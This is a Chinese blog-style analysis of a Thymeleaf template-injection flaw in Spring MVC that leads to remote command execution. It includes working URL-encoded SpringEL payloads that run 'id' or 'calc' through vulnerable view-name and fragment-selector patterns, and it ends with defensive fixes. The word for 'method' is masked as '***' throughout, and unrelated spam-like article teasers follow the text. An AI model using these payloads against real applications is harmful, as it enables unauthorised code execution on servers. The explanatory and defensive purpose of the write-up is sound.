Thymeleaf模板注入导致命令执行漏洞分析

访客4年前黑客资讯1053

本文配合:https://github.com/veracode-research/spring-view-manipulation/食用更佳。

背景:

Thymeleaf 是与 java 配合使用的一款服务端模板引擎,也是 spring 官方支持的一款服务端模板引擎。他支持 HTML 原型,在 HTML 标签中增加额外的属性来达到模板 + 数据的展示方式。默认前缀:/templates/ ,默认后缀:.html 。

首先我们来熟悉一下这个漏洞发生的一些前期知识:

一、 spring mvc 及 thymeleaf 基础

下载 github 中的项目,在 idea 中导入。(导入时选择 pom.xml 并以 project 的形式进行导入,这样他会自己去下载他的依赖,也就是 jar 包,配置 maven 这些如果有需要的话会单独写一篇文章。)
要等他下载 jar 包完成,所以稍等一会。之后,我们来到 HelloController.java 文件。
@GetMapping("/")
public String index(Model model) {
    model.addAttribute("message", "happy birthday");
    return "welcome";
}
这个 *** 名上加了 @GetMapping("/") 的注解,表示请求 *** 为 get 的 url 为 / 的请求会进到这个 *** 体里面进行处理。
在这个 *** 里面,给 model 传入了一个参数,key 为 message ,value 为 happy birthday ,这个 model 会和我们要返回的视图名一起传回前端。
这里的 return "welcome" 返回的是视图名,thymeleaf 会默认加上前缀 /templates 及后缀 .html ,即最终返回的视图名就是 /templates/welcome.html ,带上我们的数据 model 。
<!DOCTYPE HTML>
<html xmlns:th="http://www.thymeleaf.org">
<div th:fragment="header">
    <h3>Spring Boot Web Thymeleaf Example</h3>
</div>
<div th:fragment="main">
    <span th:text="'Hello, ' + ${message}"></span>
</div>
</html>
这里首先将 html 的名称空间设置为 thymeleaf ,接下来 html 文档中就可以使用 thymeleaf 中的指令了。比如接下来的 div 标签中就有 th:fragment 、th:text 这种形式,这种就是 thymeleaf 中的指令。
在倒数第三行中, ${message} 表示从 model 中取对应 key 的值,而 ${…} 这里面是 ognl/SpringEL 表达式,比如 ${7*7} 会执行里面运算,得到 49 ,同样延申一下 ognl 表达式:${#rt=@java.lang.Runtime@getRuntime(),#rt.exec("calc")} ,SpringEL 表达式:${T(java.lang.Runtime).getRuntime().exec('calc')} 。${} 内部的通过 OGNL 表达式引擎解析的,外部的通过 thymeleaf 模板引擎解析 。

漏洞出现在 thymeleaf 的片段选择器中,关于片段选择器是什么,通过一个小例子就会知道。

二、 片段选择器,templatename::selector

@GetMapping("/fragment")
    public String fragment(@RequestParam String section) {
        return "welcome :: " + section; //fragment is tainted
    }
这里接收一个 section 的参数,这个参数来决定我们页面显示哪一个部分。
这里没有上个的 Spring Boot Web Thymeleaf example 字样了。将 section 换为 header ,就没有 Hello, ${message} 字样了。
3、 漏洞详情,thymeleaf 在解析包含 :: 的模板名时,会将其作为表达式去进行执行。
官方文档中也有提到。
github 的文章给的 payload :__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
这其中除了 __ 下划线暂时不理解之外,其他的应该都能清楚了。后面的 .x 是不需要也可以的,或者也可以换成其他的字符。
__${…}__ 是 thymeleaf 中的预处理表达式,也就是会对双下划线包起来的表达式进行预处理。比如:#{selection.__${sel.code}__} ,这里的话 thymeleaf 会先对 ${sel.code} 进行解析,若解析的结果为 ALL ,那么再将其结果作为常规表达式的一部分,也即是 #{selection.ALL}
所以,结合我们的 payload ,因为 payload 中包含了 :: ,也就是会将 templatename 以及 selector 作为表达式去进行执行,在这里给的 payload 中,表达式在模板名的位置: __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()} 执行 id 这条命令,因为他会进行一个预处理那么无论他前面和后面有什么都会先去处理这个表达式,也就都会去执行里面的命令。

四、 实操

4.1 首先看一下

@GetMapping("/path")
public String path(@RequestParam String lang) {
    return "user/" + lang + "/welcome"; //template path is tainted
}

这时将 lang 参数作为模块名解析的一部分。payload :/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::

执行命令并回显。

4.2 再看一下:

@GetMapping("/fragment")
public String fragment(@RequestParam String section) {
    return "welcome :: " + section; //fragment is tainted
}

这时是将 section 放在 selector 的位置。同样是上面的 payload :/path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::

这时没有回显,状态也是 200 ,调试之后发现,前面模板名找不到会抛出一个异常,而这里是将我们的 section 放到 welcome :: 后面,而这时是找到的模板名,找不到 selector ,这时他不会抛出异常,只是没有内容显示了,但是命令还是会执行。

也就是说,如果将 payload 改成 /path?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc%22).getInputStream()).next()%7d__:: 是能弹出计算器的。
测试发现,payload :/fragment/?section=$%7bT(java.lang.Runtime).getRuntime().exec(%22calc%22)%7d 在这里也是可以执行的,因为 thymeleaf 会将 templatename 、selector 分别作为表达式执行。而这个漏洞环境中,welcome :: 后面直接加的 section ,而 section 后面也没有其他的字符影响,所以不用 __${…}__ 符号也可以。
4.3 还有一种魔幻操作,
@GetMapping("/doc/{document}")
public void getDocument(@PathVariable String document) {
    log.info("Retrieving " + document);
    //returns void, so view name is taken from URI
}
这时返回值为空,并没有返回视图名,此时的视图名会从 URI 中获取,具体实现的代码在 DefaultRequestToViewNameTranslator 中的 getViewName *** :
public String getViewName(HttpServletRequest request) {
    String lookupPath=this.urlPathHelper.getLookupPathForRequest(request, HandlerMapping.LOOKUP_PATH);
    return (this.prefix + transformPath(lookupPath) + this.suffix);
}
故此时在 uri 中的参数添加 payload 即可。
这里的 payload 必须包裹在 __...__ 之中,且后面加上 :: ,及 .string 。至于为什么我也没弄明白。

五、防御

5.1. *** 上配置 @ResponseBody 或者 @RestController
这样 spring 框架就不会将其解析为视图名,而是直接返回。不配置的话 SpringMVC 会将业务 *** 的返回值传递给 DispatcherServlet ,再由DispatcherServlet 调用 ViewResolver 对返回值进行解析,映射到一个 view 资源。
@RestController 表示该控制器会直接将业务 *** 的返回值响应给客户端,不进行视图解析。它内部继承了 @ResponseBody 。
5.2. 在返回值前面加上 "redirect:"
这样不再由 Spring ThymeleafView来进行解析,而是由 RedirectView 来进行解析。
5.3. 在 *** 参数中加上 HttpServletResponse 参数
这样 spring 会认为已经处理了 response ,无须再去进行视图名的解析。在 ServletResponseMethodArgumentResolver 类中检查了此参数。

文章来源:Medi0cr1ty,作者:medi0cr1ty

相关文章

赏樱花人太多的说说句子 看樱花看人海的心情说

来武大看一场人海,是每一朵樱花的梦想。趁着年轻,去做你想做的事,看你想看的风景,你终会遇见那人海之一。盛开的樱花这是一片花海同时也是一片人海啊,赏樱花人太多的说说句子,看樱花看人海的心情说说朋友圈。...

反编译木马找黑客-黑客初级网站(网站被黑客攻击了怎么办)

反编译木马找黑客-黑客初级网站(网站被黑客攻击了怎么办)

反编译木马找黑客相关问题 黑客初级网站相关问题 黑客榜中榜第一期怎么玩 传奇二级密码破论坛(传奇私服二级密码脚本)...

万能微信数据恢复「一年前微信聊天记录恢复」

  万能微信数据恢复免费版可以帮助用户快速的找回微信里面不小心丢失的数据,使用方法非常的简单,而且恢复的成功率非常的高,再也不用担心重要的数据不小心删除了。需要的朋友快来体验吧!   微信数据丢失,手...

深圳龙华区商务预约联系方式【皮凯敏】

深圳龙华区商务预约联系方式【皮凯敏】 今天给大家分享的内容是“深圳龙华区商务预约联系方式【皮凯敏】”,我是皮凯敏,来自景德镇市,今年33岁,作为职业:生物/制药/医疗器械,我热爱我的职业:生物/制药/...

西周燕都遗址博物馆(带您走进北京市西周燕都遗址博物馆)

西周燕都遗址博物馆(带您走进北京市西周燕都遗址博物馆)北京作为首都和全国文化中心,各类博物馆从数量和种类上位列全国前列。这些博物馆,不仅有丰富的馆藏让人百思特网大开眼界,其本身也是建筑设计的精品。北京...

怎么减腿(史上最强瘦腿小妙招,神速)

怎么减腿(史上最强瘦腿小妙招,神速)

大腿是脂肪最容易堆积的部位 尤其是大腿内侧最为严重 这两块顽固的肥肉 究竟要怎样才能甩掉? 自测:脂肪腿还是水肿腿? 用手指用力按在腿的肉厚部位(比如说大腿内侧、小腿膝盖下10~15cm...